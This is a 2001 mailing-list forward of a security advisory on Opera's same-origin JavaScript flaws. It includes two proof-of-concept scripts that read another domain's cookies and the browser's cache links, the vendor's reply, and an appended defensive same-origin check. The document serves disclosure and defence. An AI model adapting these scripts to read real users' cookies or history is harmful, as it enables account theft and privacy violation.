Fwd: Several javascript vulnerabilities in Opera

Giovanni Coppa giannicoppa@yahoo.it
Fri, 16 Nov 2001 09:11:22 +0100 (CET)


I don't want to say anything, but this guy is usually
right... anyone feel like trying it out?!?! :-))


--- Georgi Guninski <guninski@guninski.com>
wrote: 
> 
> Georgi Guninski security advisory #51, 2001
> 
> Several javascript vulnerabilities in Opera
> 
> Systems affected:
> Opera 5.12/Windows, Opera 5.0/Linux - probably other
> versions
> 
> Risk: Medium
> Date: 15 November 2001
> 
> Legal Notice:
> This Advisory is Copyright (c) 2001 Georgi Guninski.
> You may distribute it unmodified.
> You may not modify it and distribute it or
> distribute parts
> of it without the author's written permission.
> 
> Disclaimer:
> The information in this advisory is believed to be
> true based on
> experiments though it may be false.
> The opinions expressed in this advisory and program
> are my own and
> not of any company. The usual standard disclaimer
> applies,
> especially the fact that Georgi Guninski is not
> liable for any damages
> caused by direct or  indirect use of the information
> or functionality
> provided by this advisory or program. Georgi
> Guninski bears no
> responsibility for content or misuse of this
> advisory or program or
> any derivatives thereof.
> 
> Announcement:
> I am looking for contracts in the security area -
> check http://www.guninski.com
> 
> Description:
> Opera is a multiplatform web browser.
> There are several javascript vulnerabilities in it,
> basically allowing
> script in a page to access a page and its properties
> in another domain -
> AFAIK Netscape calls this "Same Origin
> Vulnerability". 
> It is possible for a script in a web page to access at
> least cookies and links
> in arbitrary domains to which the user has access.
> It is also possible for a script to read the links
> in the user's cache and 
> history, which at least have privacy implications if
> not more.
> In some cases cookies and links in the cache/history
> may contain sensitive information
> such as usernames/passwords etc.
> 
> 
> Details:
> Examine the following scripts:
> -1.----------------------------------
> a=window.open("http://mail.yahoo.com");
> function f()
> {
> xx=a.document.cookie;
> alert("hi"+xx);
> a.document.open();
> a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
> a.document.close();
> }
> setTimeout("f()",5000);
> -----------------------------------
> 
> -2.--------------------------------
> a=window.open("about:cache");
> function f()
> {
> xx=a.document.links[2];
> alert("hi="+xx);
> }
> setTimeout("f()",5000);
> -----------------------------------
> 
> In addition, the HotJava exploit at
> http://www.guninski.com/hotjava1-desc.html works, as
> Jay@InfoAve.net pointed out.
> 
> Workaround:
> Disable javascript (Opera suggests enabling "Use
> cookies to trace password protected documents")
> 
> Vendor status:
> The vendor was notified on 5 November 2001 and was
> asked whether a fix shall be issued and when.
> The reply was:
> ------------------------------------
> You should be able to resolve the cookie issue by
> enabling "Use cookies to trace password protected
> documents", 
> which means that pages with password protection
> aren't cached, cookies aren't stored, 
> the URL shouldn't be displayed in History, etc. 
> This is a "paranoia" option, and makes a few pages
> unusable.
> As you are probably aware, many web technologies
> aren't very secure, 
> but it is inconvenient for the user to block these. 
> This is why the user should be given a choice to
> block privacy related information.
> ------------------------------------
> 
> Regards,
> Georgi Guninski
> http://www.guninski.com
> ----------------------
> You may visit Guninski Security Mailing List page at
> http://www.guninski.com/mailinglist.html
> ---------------------- 

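The bug in the forwarded advisory is that Opera let a script read `document.cookie` and `document.links` of a window it had opened to a different domain. The check a browser must apply before such a read, written here as an added example (not code from the advisory or from Opera), compares scheme, host and effective port of the two pages and refuses access otherwise; the sample windows and cookie value are constructed, and `readCrossWindow` is a hypothetical stand-in for the browser's property access path.

```javascript
// Same-origin check: two pages share an origin only if scheme, host and
// effective port all match. Schemes without a host (about:, file:, ...) get
// an opaque origin that never matches, so "about:cache" is never readable.
const DEFAULT_PORTS = { "http:": "80", "https:": "443", "ftp:": "21" };

// Origin tuple for a URL, or null for schemes with an opaque origin.
function originOf(urlString) {
  const u = new URL(urlString);
  if (!(u.protocol in DEFAULT_PORTS)) return null;
  return {
    scheme: u.protocol,
    host: u.hostname.toLowerCase(),
    port: u.port || DEFAULT_PORTS[u.protocol], // URL drops default ports
  };
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  if (oa === null || ob === null) return false;
  return oa.scheme === ob.scheme && oa.host === ob.host && oa.port === ob.port;
}

// Hypothetical access gate: `callerUrl` is the page running the script,
// `target` stands in for a window it opened. The property is returned only
// on a same-origin match; otherwise the read fails instead of leaking data.
function readCrossWindow(callerUrl, target, property) {
  if (!sameOrigin(callerUrl, target.url)) {
    throw new Error(`SecurityError: ${callerUrl} may not read ${property} of ${target.url}`);
  }
  return target.document[property];
}

// Constructed sample windows mirroring the two scripts in the advisory.
const mailWindow = {
  url: "http://mail.yahoo.com/",
  document: { cookie: "session=constructed-sample" },
};
const cacheWindow = {
  url: "about:cache",
  document: { links: ["http://example.net/a", "http://example.net/b"] },
};

// Returns "allowed" or "denied" for a given caller/target/property triple.
function accessResult(callerUrl, target, property) {
  try {
    readCrossWindow(callerUrl, target, property);
    return "allowed";
  } catch (e) {
    return "denied";
  }
}
```

With this gate in place, the advisory's first script (an arbitrary page reading the mail window's cookie) and second script (reading links out of `about:cache`) both end in "denied", while a page on the same host and port still reads its own window.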